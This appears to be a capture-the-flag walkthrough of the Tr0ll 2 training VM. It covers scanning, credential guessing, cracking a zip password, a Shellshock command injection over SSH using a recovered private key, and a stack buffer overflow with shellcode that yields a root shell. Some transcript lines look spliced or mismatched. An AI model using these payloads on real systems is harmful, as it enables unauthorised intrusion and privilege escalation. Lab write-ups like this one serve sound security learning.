walkthroughs

Coffee Difficulty Rating:

I rooted Tr0ll 1, so thought it would be rude not to try the second VM in the Tr0ll series… Tr0ll 2 requires a buffer overflow to perform local escalation, the first VM didn’t require any exploitation. However, like the first VM I’d say this is challenege is more a case of guessing credentials, trying things you think probably wont work.

Description

The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)

Difficulty is beginner++ to intermediate.

##Enumeration

Enumeration process started.

nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6 root:~# nmap -p 1-65535 -sV -sS -A -T4 172.31.31.6

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-02 19:24 EST



Host is up (0.0026s latency).

Not shown: 65532 closed ports

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 2.0.8 or later

22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

22/tcp open ssh (protocol 2.0)

| ssh-hostkey:

| 1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)

| 2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)

|_ 256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)

80/tcp open http Apache httpd 2.2.22 ((Ubuntu))

|_http-title: Site doesn't have a title (text/html).

Device type: general purpose

Running: Linux 3.X

OS CPE: cpe:/o:linux:linux_kernel:3

OS details: Linux 3.2 - 3.8

Network Distance: 2 hops

Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel



OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds

</p>

###Service Enumeration

Port Service Version Detection TCP: 21 FTP vsftpd 2.0.8 or later TCP: 22 SSH OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0) TCP: 80 HTTP Apache httpd 2.2.22 ((Ubuntu))

###SSH Enumeration

Zoning out watching my Nmap scan complete I noticed, the hostname was Tr0ll. I attempted to login via ssh with Tr0ll password: Tr0ll , it worked ! But I instantly got booted off, tried a few things nothing worked… So I tried FTP.

###FTP Enumeration

I tired the same credentials against ftp and discovered a file called “noob” in the ftp root.

ftp noob root:~# ftp 172.31.31.6

Connected to 172.31.31.6

220 Welcome to Tr0ll FTP... Only noobs stay for a while...

Name (172.31.31.6:root): Tr0ll

331 Please specify the password.

Password:

230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> get lmao.zip

local: lol.pcap remote: lol.pcap

200 PORT command successful. Consider using PASV.

150 Opening BINARY mode data connection for lmao.zip (1474 bytes).

226 Transfer complete.

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

1474 bytes received in 0.02 secs (60.6 kB/s)

ftp> exit

221 Goodbye.

</p>

Attempting to extract lmao.zip failed, prompting for a noob password.

Onto the next service then…

###HTTP Enumeration

Web browser showed:

nmap --script=http-enum -p80 -n 172.31.31.6 root:~# nmap --script=http-enum -p80 -n 172.31.31.6

Starting Nmap 6.47 ( http://nmap.org ) at 2015-01-2 18:40 GMT

Nmap scan report for 172.31.31.6

Host is up (0.00046s latency).

PORT STATE SERVICE

80/tcp open http

| http-enum:

| /robots.txt: Robots file



Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds

</p>

Entering /robots.txt url in the browser rendered:

User-agent: * Disallow: /noob /nope /try_harder /keep_trying /isnt_this_annoying /nothing_here /404 /LOL_at_the_last_one /trolling_is_fun /zomg_is_this_it /you_found_me /I_know_this_sucks /You_could_give_up /dont_bother /will_it_ever_end /I_hope_you_scripted_this /ok_this_is_it /stop_whining /why_are_you_still_looking /just_quit /seriously_stop

The slash was stripped off with some sed sed 's./..g' robots.txt dirb was then used to check the following urls.

----------------- DIRB v2.21 By The Dark Raver ----------------- START_TIME: Sat Jan 3 08:08:15 2015 URL_BASE: http://172.31.31.6/ WORDLIST_FILES: robots.txt ----------------- GENERATED WORDS: 21 ---- Scanning URL: http://172.31.31.6/ ---- + http://172.31.31.6//noob ( CODE:301|SIZE:309 ) + http://172.31.31.6//keep_trying ( CODE:301|SIZE:316 ) + http://172.31.31.6//dont_bother ( CODE:301|SIZE:316 ) + http://172.31.31.6//ok_this_is_it ( CODE:301|SIZE:318 ) ----------------- DOWNLOADED: 21 - FOUND: 4

They all rendered the same image (301’d).

Nothing exciting was in the page source:

What did you really think to find here? Try Harder

cat_the_troll.jpg was downloaded from all the above locations from the target and examined.

ls -la showed a slightly different file size for one of the images, I began by running each of the files through cat (cating the cat? - sorry).

Look Deep within y0ur_self for the answer

I tired this against the previously downloaded lmao.zip file, no luck. I tried y0ur_self as web path like on tr0ll:1

Success, the web dir contained a text file http://172.31.31.6/y0ur_self/answer.txt scrolling though from the browser it looked like the file was base64 encoded.

wget http://172.31.31.6/y0ur_self/answer.txt root:~# wget http://172.31.31.6/y0ur_self/answer.txt

</p>

Decoding the file revealed it was massive, the following was used to decode and sort by line length:

base64 decoding root:~# base64 -d answer.txt > answer-decoded.txt && awk '{print length, $0;}' answer-decoded.txt | sort -nr | less



30 ItCantReallyBeThisEasyRightLOL </p>

The top line looked promising, ItCantReallyBeThisEasyRightLOL I tried this against lmao.zip

unzip lmao.zip root:~# unzip lmao.zip Archive: lmao.zip

[lmao.zip] noob password:

inflating: noob

</p>

Yes!

The contents of noob

-----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1 /9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5 z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0 gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079 La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t 0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g == -----END RSA PRIVATE KEY-----

SSH Shellshock

Attempting to login using the discovered key failed, with a messaging saying TRY HARDER LOL! .

I tried to feed it commands by tagging them on the end, the connection hung then dropped with no message.

I googled some shellshock options and managed to spawn a shell with:

ssh -i noob [email protected] '() { :;}; /bin/bash'

shellshock ssh root:~# ssh -i noob [email protected] '() { :;}; /bin/bash'

id

uid=1002(noob) gid=1002(noob) groups=1002(noob)

</p>

##Local Enumeration

Transfered my local enumeration script to the target, disclosing the following odd sticky bit files:

######################################### ## Sticky Bit ## ######################################### drwsr-xr-x 3 root root 4096 Dec 29 19:00 /nothing_to_see_here drwsr-xr-x 5 root root 4096 Oct 4 22:36 /nothing_to_see_here/choose_wisely drwsr-xr-x 2 root root 4096 Oct 5 21:19 /nothing_to_see_here/choose_wisely/door2 drwsr-xr-x 2 root root 4096 Oct 5 21:18 /nothing_to_see_here/choose_wisely/door3 drwsr-xr-x 2 root root 4096 Oct 4 22:19 /nothing_to_see_here/choose_wisely/door1

Each of the door directories contained a file called r00t, du -sh * in the parent dir choose_wisely showed one of the files was larger - I started there.

od -S 1 r00t was used against each of the files, the larget file contained:

0017545 bof.c 0017553 __init_array_end 0017574 _DYNAMIC 0017605 __init_array_start 0017630 _GLOBAL_OFFSET_TABLE_ 0017656 __libc_csu_fini 0017676 __i686.get_pc_thunk.bx 0017725 data_start 0017740 printf @@GLIBC_2.0 0017762 _edata 0017771 _fini 0017777 [email protected]@GLIBC_2.0 0020021 __DTOR_END__ 0020036 __data_start 0020053 __gmon_start__ 0020072 exit @@GLIBC_2.0 0020112 __dso_handle 0020127 _IO_stdin_used 0020146 [email protected]@GLIBC_2.0 0020203 __libc_csu_init

bof.c - pretty good indication that Buffer Overflow was the next logical step (unless it’s more tr0ling).

##Exploit Development

###Fuzzing

I started by fuzzing with 300 A’s:

fuzzing linux binary root:~# ./r00t $(python -c 'print "A" *300')

Segmentation fault

</p>

Bangin’ then I tried 250 no crash, adding 10 each time then subtracting when the seg fault occoured at 268 and the instruction pointer address at 269 Illegal instruction .

Using gdb I located the address of ESP.

( gdb ) i r esp esp 0xbffffb80 0xbffffb80

Padded with some NOPs - for a reliable landing.

Overwrote EIP with the location of ESP and tagged some shellcode on the end to exectute a shell.

###Final Exploit

./r00t $( python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"' )

Note: gdb drops privileges on SUID, in order to spawn the new shell with SUID you need to execute the exploit outside of gdb, or the shell will spawn as the unprivileged user.

The binaries in choose_wisely/door* are rotated, the largest is the vulnerable binary.

Exploit Process root:~# du -sh *

12K door1

12K door2

16K door3

root:~# cd door3

root:~# ./r00t $(python -c 'print "A"*268 + "\x80\xfb\xff\xbf" + "\x90" *

10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\

xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"') root:~# whoami

root



root:~# cat /root/Proof.txt

You win this time young Jedi...

a70354f0258dcc00292c72aab3c8b1e4



##Root dance

##Thanks

Thanks to @maleus21 for creating this VM challenege.